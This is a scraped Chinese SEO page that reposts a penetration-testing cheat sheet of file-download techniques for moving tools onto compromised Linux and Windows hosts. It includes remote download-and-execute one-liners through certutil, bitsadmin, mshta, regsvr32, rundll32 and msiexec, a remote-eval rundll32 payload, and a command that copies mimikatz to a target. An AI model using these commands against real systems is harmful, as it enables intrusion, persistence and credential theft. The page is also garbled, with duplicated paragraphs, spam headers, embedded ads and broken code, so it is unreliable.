日韩精品亚洲精品中文字幕乱伦AV|曰韩区二区三区日韩中文字幕五码|ady99久久人人看人人摸人人|动漫一区二区黄99精品视频在线|AV片在线观看亚洲中文国产精品|伦乱在线VA欧美性爱一二区|亚洲无码mv91热色视频|激情六月综合欧美精品中文

當(dāng)前位置:首頁 > 軟件開放 > 正文內(nèi)容

php代碼下載(php寫代碼軟件)

軟件開放1年前 (2023-12-20)487

原文:https://www.cnblogs.com/-mo-/p/12109717.html

原文:https://www.cnblogs.com/-mo-/p/12109717.html

1. 簡(jiǎn)介

在我們滲透測(cè)試的過程中,通常會(huì)需要向目標(biāo)主機(jī)傳送一些文件,來達(dá)到提權(quán),維持控制等目的。因此當(dāng)不方便進(jìn)行直接傳輸時(shí),同時(shí)目標(biāo)主機(jī)是能有網(wǎng)絡(luò)連接的,那么此時(shí)就可以通過本地下載這種方法來達(dá)到文件傳輸?shù)哪康?。此篇文章,我?huì)對(duì)互聯(lián)網(wǎng)上針對(duì) win 與 linux 大部分的下載指令來做一個(gè)匯總,可能會(huì)有疏漏,但匯總的都是經(jīng)常會(huì)用的。

在我們滲透測(cè)試的過程中,通常會(huì)需要向目標(biāo)主機(jī)傳送一些文件,來達(dá)到提權(quán),維持控制等目的。因此當(dāng)不方便進(jìn)行直接傳輸時(shí),同時(shí)目標(biāo)主機(jī)是能有網(wǎng)絡(luò)連接的,那么此時(shí)就可以通過本地下載這種方法來達(dá)到文件傳輸?shù)哪康?。此篇文章,我?huì)對(duì)互聯(lián)網(wǎng)上針對(duì) win 與 linux 大部分的下載指令來做一個(gè)匯總,可能會(huì)有疏漏,但匯總的都是經(jīng)常會(huì)用的。

這款工具功能很豐富,可以充當(dāng)某種功能完備的 GUI 下載管理器,它擁有一款理想的下載管理器所需要的所有功能,比如它可以恢復(fù)下載,可以下載多個(gè)文件,出現(xiàn)某個(gè)連接問題后,可以重新嘗試下載,你甚至可以管理最大的下載帶寬。

這款工具功能很豐富,可以充當(dāng)某種功能完備的 GUI 下載管理器,它擁有一款理想的下載管理器所需要的所有功能,比如它可以恢復(fù)下載,可以下載多個(gè)文件,出現(xiàn)某個(gè)連接問題后,可以重新嘗試下載,你甚至可以管理最大的下載帶寬。

直接下載:

wget http://www.sample-videos.com/video/mp4/big.mp4

后臺(tái)下載:

展開全文

wget -b http://www.sample-videos.com/video/mp4/big.mp4

如果互聯(lián)網(wǎng)連接出現(xiàn)中斷,恢復(fù)下載:

wget -c http://www.sample-videos.com/video/mp4/big.mp4

從某個(gè)密碼保護(hù)的 ftp 軟件庫(kù)下載文件:

wget --ftp-user=user_name --ftp-password=Give_password Download-url-address

2.2 Curl

Curl 是另一種高效的下載工具,它可以用來上傳或下載文件,只要使用一個(gè)簡(jiǎn)單的命令。它支持暫停和恢復(fù)下載程序包,并支持?jǐn)?shù)量最多的 Web 協(xié)議,可預(yù)測(cè)下載完成還剩余多少時(shí)間,可通過進(jìn)度條來顯示下載進(jìn)度。它是所有 Linux 發(fā)行版的內(nèi)置工具。

Curl 是另一種高效的下載工具,它可以用來上傳或下載文件,只要使用一個(gè)簡(jiǎn)單的命令。它支持暫停和恢復(fù)下載程序包,并支持?jǐn)?shù)量最多的 Web 協(xié)議,可預(yù)測(cè)下載完成還剩余多少時(shí)間,可通過進(jìn)度條來顯示下載進(jìn)度。它是所有 Linux 發(fā)行版的內(nèi)置工具。

直接下載:

curl -o um.mp4 http://www.sample-videos.com/video/mp4/big.mp4

借助 - o 選項(xiàng),提供名稱,下載文件會(huì)以該名稱保存;如使用 - O 選項(xiàng),文件就會(huì)以原始名稱保存。

2.3 Axel

這是 wget 的出色替代者,是一款輕量級(jí)下載實(shí)用工具。它實(shí)際上是個(gè)加速器,因?yàn)樗蜷_了多路 http 連接,可下載獨(dú)立文件片段,因而文件下載起來更快速。

這是 wget 的出色替代者,是一款輕量級(jí)下載實(shí)用工具。它實(shí)際上是個(gè)加速器,因?yàn)樗蜷_了多路 http 連接,可下載獨(dú)立文件片段,因而文件下載起來更快速。

apt-get install axel

直接下載:

axel http://www.sample-videos.com/video/mp4/big.mp4

2.4 Aria2

這是一種開源命令行下載加速器,支持多個(gè)端口,你可以使用最大帶寬來下載文件,是一款易于安裝、易于使用的工具。

apt-get install aria2

直接下載:

aria2c http://www.sample-videos.com/video/mp4/big.mp4

2.5 Perl

Perl 是一門很吊的語言,使用它基本可以實(shí)現(xiàn)任何事情,用它實(shí)現(xiàn)文件下載也很簡(jiǎn)單。

#!perl

#!/usr/bin/perl

use LWP::Simple;

getstore( "http://domain/file", "file");

php代碼下載(php寫代碼軟件)

執(zhí)行腳本文件是這樣:

perl test.pl

2.6 Python

Python 也是很受歡迎的主流腳本語言,代碼清晰且簡(jiǎn)潔:

#!python

#!/usr/bin/python

import urllib2

u = urllib2.urlopen( 'http://domain/file')

localFile = open( 'local_file', 'w')

localFile.write(u.read)

localFile.close

2.7 Ruby

Ruby 是一個(gè)面對(duì)對(duì)象的語言,Metasploit 框架就是用它來實(shí)現(xiàn)的,當(dāng)然他也可以實(shí)現(xiàn)像下載文件這樣的小任務(wù)。微信搜索公眾號(hào):前端技術(shù)編程,回復(fù):前端 領(lǐng)取資料 。

Ruby 是一個(gè)面對(duì)對(duì)象的語言,Metasploit 框架就是用它來實(shí)現(xiàn)的,當(dāng)然他也可以實(shí)現(xiàn)像下載文件這樣的小任務(wù)。微信搜索公眾號(hào):前端技術(shù)編程,回復(fù):前端 領(lǐng)取資料 。

#!ruby

#!/usr/bin/ruby

require 'net/http'

Net::HTTP.start( "www.domain.com") { |http|

r = http.get( "/file")

open( "save_location", "wb") { |file|

file.write(r.body)

}

}

執(zhí)行腳本文件是這樣;

ruby test.rb

2.8 PHP

PHP 作為一種服務(wù)端腳本,也可以實(shí)現(xiàn)下載文件這種功能。

#!/usr/bin/php

?php

$data= @file( "http://example.com/file");

$lf= "local_file";

$fh= fopen( $lf, 'w');

fwrite( $fh, $data[0]);

fclose( $fh);

?

執(zhí)行腳本文件是這樣:

php test.php

2.9 FTP

一般情況下攻擊者使用 FTP 上傳文件需要很多交互的步驟,下面這個(gè) bash 腳本,考慮到了交互的情況,可以直接執(zhí)行并不會(huì)產(chǎn)生交互動(dòng)作。

一般情況下攻擊者使用 FTP 上傳文件需要很多交互的步驟,下面這個(gè) bash 腳本,考慮到了交互的情況,可以直接執(zhí)行并不會(huì)產(chǎn)生交互動(dòng)作。

ftp 127.0.0.1

username

password

get file

exit

當(dāng)然根據(jù)實(shí)際情況也可以進(jìn)入交互終端:

ftp 192.168.3.2

輸入用戶名和密碼后

lcd E:\file # 進(jìn)入E盤下的file目錄

cdwww # 進(jìn)入服務(wù)器上的www目錄

get access.log # 將服務(wù)器上的access.log下載到E:\file

2.10 Netcat

攻擊者的電腦上輸入:

cat file | nc -l 1234

這個(gè)命令會(huì)將 file 的內(nèi)容輸出到本地的 1234 端口中,然后不論誰連接此端口,file 的內(nèi)容將會(huì)發(fā)送到連接過來的 IP。

這個(gè)命令會(huì)將 file 的內(nèi)容輸出到本地的 1234 端口中,然后不論誰連接此端口,file 的內(nèi)容將會(huì)發(fā)送到連接過來的 IP。

目標(biāo)電腦上的命令:

nc host_ip 1234 file

這條命令將連接攻擊者的電腦,接受 file 內(nèi)容保存。

3. Windows3.1 Powershell

PowerShell 是一種 winodws 原生的腳本語言,對(duì)于熟練使用它的人來說,可以實(shí)現(xiàn)很多復(fù)雜的功能。

下面這兩條指令實(shí)現(xiàn)了從 Internet 網(wǎng)絡(luò)下載一個(gè)文件。

$p= New-Object System.Net.WebClient

$p.DownloadFile( "http://domain/file""C:\%homepath%\file")

3.2 IPC$

copy \192.168.3.1\c$\test.exe E:\file

cmd.exe /k \webdavserver\folder\batchfile.txt

3.3 Certutil

可以應(yīng)用到: Windows Server 2003, Windows Server 2003 R2, Windows Server 2003 with SP1, Windows Server 2003 with SP2

certutil -urlcache -split -f http://192.168.3.1/test.exe file.exe

certutil -urlcache -split -f http://192.168.3.1/test.exe delete #刪除緩存

certutil -verifyctl -split -f -split http://192.168.3.1/test.exe

#此條命令,會(huì)將原文件下載成為臨時(shí) bin 文件,把名字改回來一樣可以正常運(yùn)行

文件下載并執(zhí)行如下:

certutil -urlcache -split -f http://site.com/a a.exe a.exe del a.exe certutil -urlcache -split -f http://192.168.254.102:80/a delete

3.4 Visual Basic

在 1998 年 Visual Basic 最終標(biāo)準(zhǔn)在 windows 上確定。下面的代碼可以實(shí)現(xiàn)下載文件,雖然它的長(zhǎng)度比 Powershell 長(zhǎng)多了。微信搜索公眾號(hào):架構(gòu)師指南,回復(fù):架構(gòu)師 領(lǐng)取資料 。

在 1998 年 Visual Basic 最終標(biāo)準(zhǔn)在 windows 上確定。下面的代碼可以實(shí)現(xiàn)下載文件,雖然它的長(zhǎng)度比 Powershell 長(zhǎng)多了。微信搜索公眾號(hào):架構(gòu)師指南,回復(fù):架構(gòu)師 領(lǐng)取資料 。

Set args = W.Arguments

Url = "http://domain/file"

dim xHttp: Set xHttp = createobject( "Microsoft.XMLHTTP")

dim bStrm: Set bStrm = createobject( "Adodb.Stream")

xHttp.Open "GET", Url, False

xHttp.Send

with bStrm

. type= 1 '

.open

.write xHttp.responseBody

.savetofile " C:\%homepath%\file", 2 '

end with

在 windows 中 C 指令可以允許你執(zhí)行 VBS 腳本文件或者對(duì) 腳本做一些設(shè)置。在 windows 7 中這個(gè)指令并不是必須要用到。但是在 windows XP 中需要使用這條指令,如下所示:

在 windows 中 C 指令可以允許你執(zhí)行 VBS 腳本文件或者對(duì) 腳本做一些設(shè)置。在 windows 7 中這個(gè)指令并不是必須要用到。但是在 windows XP 中需要使用這條指令,如下所示:

c test.vbs

3.5 Tftp

在 Windows Vista 以及以后的版本中默認(rèn)有 FTP,可以使用以下命令運(yùn)行:

上傳:

tftp -i IP地址 PUT C:\%homepath%\file 遠(yuǎn)程存放位置

下載:

tftp -i IP地址 GET C:\%homepath%\file 本地存放位置

3.6 Bitsadmin

Bitsadmin 是 Windows 命令行工具,用戶可以使用它來創(chuàng)建下載或上傳的任務(wù)。只能命令下載到指定路徑上,win7 以上:

bitsadmin /transfer myDownLoadJob /download /priority normal "http://192.168.203.140/b.ps1""E:\\phpstudy_pro\\WWW\\b.ps1"

bitsadmin /rawreturn /transfer getfile http://192.168.3.1/test.txt E:\file\test.txt

bitsadmin /rawreturn /transfer getpayload http://192.168.3.1/test.txt E:\file\test.txt

3.7 msiexec

msiexec /q /i http://192.168.3.1/calc.png

calc.png:

msfvenom -f msi -p windows/ execCMD=calc.exe cacl.png

3.8 IEExec

C:\Windows\Microsoft.NET\Framework\v2.0.50727 caspol -s off

C:\Windows\Microsoft.NET\Framework\v2.0.50727 IEExec http://192.168.3.1/test.exe

3.9 Python

C:\python27\python.exe -c “import urllib2; execurllib2.urlopen(‘http://192.168.3.1/test.zip’). read;”

3.10 Mshta

mshta http://192.168.3.1/run.hta

run.hta 內(nèi)容如下:

HTML

meta http-equiv= "Content-Type"content= "text/html; charset=utf-8"

HEAD

language= "VB"

Window.ReSizeTo 0, 0

Window.moveTo -2000,-2000

Set objShell = CreateObject( "W.Shell")

objShell.Run "cmd.exe /c net user"http:// 這里填寫命令

self.close

/

body

demo

/body

/HEAD

/HTML

mshta vb:Close(Execute( "GetObject("":http://webserver/payload.sct"")"))

3.11 Rundll32

依賴于 W.shell 這個(gè)組件:

rundll32.exe java: "\..\mshtml,RunHTMLApplication ";document.write;h=new%20ActiveXObject( "WinHttp.WinHttpRequest.5.1");h.Open( "GET", "http://127.0.0.1:8081/connect", false);try{h.Send;b=h.ResponseText; eval(b);}catch(e){new%20ActiveXObject( "W.Shell").Run( "cmd /c taskkill /f /im rundll32.exe",0, true);}%

3.12 Regsvr32

Regsvr32 命令用于注冊(cè) COM 組件,是 Windows 系統(tǒng)提供的用來向系統(tǒng)注冊(cè)控件或者卸載控件的命令,以命令行方式運(yùn)行。

WinXP 及以上系統(tǒng)的 regsvr32.exe 在 windows\system32 文件夾下;2000 系統(tǒng)的 regsvr32.exe 在 winnt\system32 文件夾下。

regsvr32 /u /s /i:http://192.168.3.1/test.data scrobj.dll

test.data 內(nèi)容:

還可以利用

https://github.com/CroweCybersecurity/ps1encode 生成 sct 文件:

regsvr32 /u /s /i:http://192.168.3.1/test.sct scrobj.dll

3.13 Windows Share

Windows shares 可以加載一個(gè)驅(qū)動(dòng)器,然后用命令來復(fù)制文件。

加載遠(yuǎn)程驅(qū)動(dòng):

net use x: \\127.0.0.1\share /user:example.com\userID myPassword

3.14 格式轉(zhuǎn)換

當(dāng)需要把一個(gè) exe 文件放到目標(biāo)計(jì)算機(jī)上時(shí),Nishang 可以使用 PowerShell 允許你把一個(gè) exe 轉(zhuǎn)換成 hex,然后把 hex 再轉(zhuǎn)換成原來的 exe 文件:

當(dāng)需要把一個(gè) exe 文件放到目標(biāo)計(jì)算機(jī)上時(shí),Nishang 可以使用 PowerShell 允許你把一個(gè) exe 轉(zhuǎn)換成 hex,然后把 hex 再轉(zhuǎn)換成原來的 exe 文件:

把 exe 轉(zhuǎn)成 hex 文件輸入:

PS .\ExetoText.ps1 evil.exe evil.txt

打開 evil.txt 文件,復(fù)制內(nèi)容,然后通過 RDP 的剪貼板復(fù)制進(jìn)目標(biāo)計(jì)算機(jī),把 hex 文件還原成 exe 文件輸入:

PS .\TexttoExe.ps1 evil.text evil.exe

3.15 其它

1.MSXSL.EXE

msxsl.exe 是微軟用于命令行下處理 XSL 的一個(gè)程序,所以通過他,我們可以執(zhí)行 Java 進(jìn)而執(zhí)行系統(tǒng)命令。

2.pubprn.vbs

在 Windows 7 以上版本存在一個(gè)名為 PubPrn.vbs 的微軟已簽名 WSH 腳本,其位于

C:\Windows\System32\Printing_Admin_s\en-US

3.esentutl.exe/extrac32.exe

esentutl.exe /y "\\172.16.249.149\share mimikatz_trunk.zip"/d "C:\Users\Public\mimikatz_trunk.zip"/0

extrac32.exe /Y /C \\172.16.249.149\share\test.txt C:\Users\Public\test.txt

4.desktopimgdownldr.exe

desktopimgdownldr.exe 位于 Win10 的 system32 文件夾中,原本用于設(shè)置鎖定屏幕或桌面背景圖像的。

普通用戶可以用:

set"SYSTEMROOT=C:\ProgramData" cmd /c desktopimgdownldr.exe /lockscreenurl:http://url/xxx.exe /eventName:desktopimgdownldr

這樣來下載文件。

可以把 C:\ProgramData 來改成一個(gè)普通用戶可寫的目錄。

下載的文件存放于:

C:\ProgramData\Personalization\LockScreenImage\x_%random%.exe.

管理員用戶會(huì)多寫一個(gè)注冊(cè)表項(xiàng),所以管理員最好的命令是:

set"SYSTEMROOT=C:\ProgramData\" cmd /c desktopimgdownldr.exe /lockscreenurl:https://url/file.exe /eventName:desktopimgdownldr reg delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\PersonalizationCSP /f

END

官方站點(diǎn):www.linuxprobe.com

Linux命令大全:www.linuxcool.com

(新群,火熱加群中……)

掃描二維碼推送至手機(jī)訪問。

版權(quán)聲明:本文由飛速云SEO網(wǎng)絡(luò)優(yōu)化推廣發(fā)布,如需轉(zhuǎn)載請(qǐng)注明出處。

本文鏈接:http://m.atlasseeker.com/post/72247.html

標(biāo)簽: php代碼下載

“php代碼下載(php寫代碼軟件)” 的相關(guān)文章

打車軟件開發(fā)(打車軟件開發(fā)需要什么)

打車軟件開發(fā)(打車軟件開發(fā)需要什么)

本篇文章給大家談?wù)劥蜍囓浖_發(fā),以及打車軟件開發(fā)需要什么對(duì)應(yīng)的知識(shí)點(diǎn),希望對(duì)各位有所幫助,不要忘了收藏本站喔。 本文目錄一覽: 1、定制開發(fā)一個(gè)類似滴滴打車的服務(wù)軟件,需多少錢 2、打車app開發(fā)流程 3、打車軟件開發(fā)過程中存在的十大風(fēng)險(xiǎn)有哪些 定制開發(fā)一個(gè)類似滴滴打車的服務(wù)軟件,需多少錢...

軟件開發(fā)管理(軟件開發(fā)管理的基本職能)

軟件開發(fā)管理(軟件開發(fā)管理的基本職能)

本篇文章給大家談?wù)勡浖_發(fā)管理,以及軟件開發(fā)管理的基本職能對(duì)應(yīng)的知識(shí)點(diǎn),希望對(duì)各位有所幫助,不要忘了收藏本站喔。 本文目錄一覽: 1、軟件開發(fā)企業(yè)質(zhì)量管理 2、如何對(duì)軟件開發(fā)進(jìn)行進(jìn)度管理 3、軟件開發(fā)項(xiàng)目中的相關(guān)方和目標(biāo)管理 4、軟件項(xiàng)目的管理流程 軟件開發(fā)企業(yè)質(zhì)量管理 軟件...

廈門思維軟件開發(fā)(廈門思維課程機(jī)構(gòu)有哪些)

廈門思維軟件開發(fā)(廈門思維課程機(jī)構(gòu)有哪些)

本篇文章給大家談?wù)剰B門思維軟件開發(fā),以及廈門思維課程機(jī)構(gòu)有哪些對(duì)應(yīng)的知識(shí)點(diǎn),希望對(duì)各位有所幫助,不要忘了收藏本站喔。 本文目錄一覽: 1、廈門軟件開發(fā)公司哪家好? 2、廈門艾孚思軟件開發(fā)有限公司怎么樣? 3、廈門好思維教育科技有限公司怎么樣? 4、廈門軟件開發(fā),廈門軟件開發(fā)多少錢 5...

國(guó)外網(wǎng)站新聞軟件(國(guó)外的新聞軟件)

國(guó)外網(wǎng)站新聞軟件(國(guó)外的新聞軟件)

今天給各位分享國(guó)外網(wǎng)站新聞軟件的知識(shí),其中也會(huì)對(duì)國(guó)外的新聞軟件進(jìn)行解釋,如果能碰巧解決你現(xiàn)在面臨的問題,別忘了關(guān)注本站,現(xiàn)在開始吧!本文目錄一覽: 1、查看國(guó)際新聞?dòng)檬裁窜浖?2、求問!求問!有什么軟件可以關(guān)注全球新聞,特別是民生新聞,經(jīng)濟(jì)等等之類的。謝謝各位了! 3、有什么可以看國(guó)外英...

樓房裝修所需插座有哪些(樓房裝修所需插座有哪些材料)

樓房裝修所需插座有哪些(樓房裝修所需插座有哪些材料)

今天給各位分享樓房裝修所需插座有哪些的知識(shí),其中也會(huì)對(duì)樓房裝修所需插座有哪些材料進(jìn)行解釋,如果能碰巧解決你現(xiàn)在面臨的問題,別忘了關(guān)注本站,現(xiàn)在開始吧!本文目錄一覽: 1、很多人裝修的時(shí)候都會(huì)忽略掉一些插座,哪些插座必不可少? 2、新房裝修的時(shí)候,家里有哪些位置的開關(guān)插座是必須要裝的? 3、裝...

數(shù)碼寶貝卡牌DTCG官網(wǎng)(數(shù)碼寶貝卡牌dtcg官網(wǎng)下載)

數(shù)碼寶貝卡牌DTCG官網(wǎng)(數(shù)碼寶貝卡牌dtcg官網(wǎng)下載)

本篇文章給大家談?wù)剶?shù)碼寶貝卡牌DTCG官網(wǎng),以及數(shù)碼寶貝卡牌dtcg官網(wǎng)下載對(duì)應(yīng)的知識(shí)點(diǎn),希望對(duì)各位有所幫助,不要忘了收藏本站喔。 本文目錄一覽: 1、數(shù)碼寶貝dtcg規(guī)則 開始回合抽幾張 2、數(shù)碼寶貝dtcg卡牌尺寸 3、數(shù)碼寶貝DTCG在山西有負(fù)責(zé)人嗎? 4、數(shù)碼寶貝對(duì)戰(zhàn)卡牌用不用補(bǔ)...